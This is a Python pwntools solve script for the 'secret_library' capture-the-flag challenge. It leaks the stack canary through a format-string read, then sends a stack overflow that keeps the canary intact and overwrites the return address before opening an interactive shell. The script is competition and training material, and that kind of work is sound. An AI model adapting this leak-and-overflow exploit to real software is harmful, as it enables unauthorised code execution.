#!/usr/bin/env python3
"""Solve script for the `secret_library` challenge (m0lecon CTF).

Flow, as written here: print the first service line, send one
format-string read to disclose the stack canary, then send a fixed-size
overflow whose canary slot carries the disclosed value so the return
address after the saved rbp can be replaced.  Root cause on the target
is the format-string sink: the canary is only a mitigation while no
read primitive can reveal it.
"""
from pwn import *

# Positional argument index the format string uses to read the canary.
CANARY_POS = 23
# Bytes of filler between the start of the overflowed buffer and the
# canary slot.
CANARY_OFF = 136

# Return-address chain written after the saved-rbp slot.  What each
# address refers to is not recoverable from this script (no symbols here)
# -- NOTE(review): verify both against the binary before reuse.
RET_CHAIN = (0x000000000040101a, 0x0000000000401262)

elf = context.binary = ELF("./secret_library", checksec=False)

# Local run kept for reference; the live target is the remote service.
#p = process(elf.path)
p = remote('offsec.m0lecon.it', 13501)

# Echo whatever the service sends first.
print(p.recvline())

# Stage 1: read the canary back through the format string.  The reply is
# expected to be comma-separated with the hex value in the second field.
p.sendline(f"%{CANARY_POS}$lx".encode())
leaked = p.recvline().split(b",")[1].strip()
print(leaked)
canary = int(leaked, 16)

# Line preceding the second input.
print(p.recvline())

# Stage 2: overflow with the real canary in place.
payload = b"".join([
    b'A' * CANARY_OFF,
    p64(canary),
    b'B' * 8,  # filler for the saved-rbp slot
    p64(RET_CHAIN[0]),
    p64(RET_CHAIN[1]),
])
p.send(payload)

print(p.recvline())
#print(p.recvline())
p.interactive()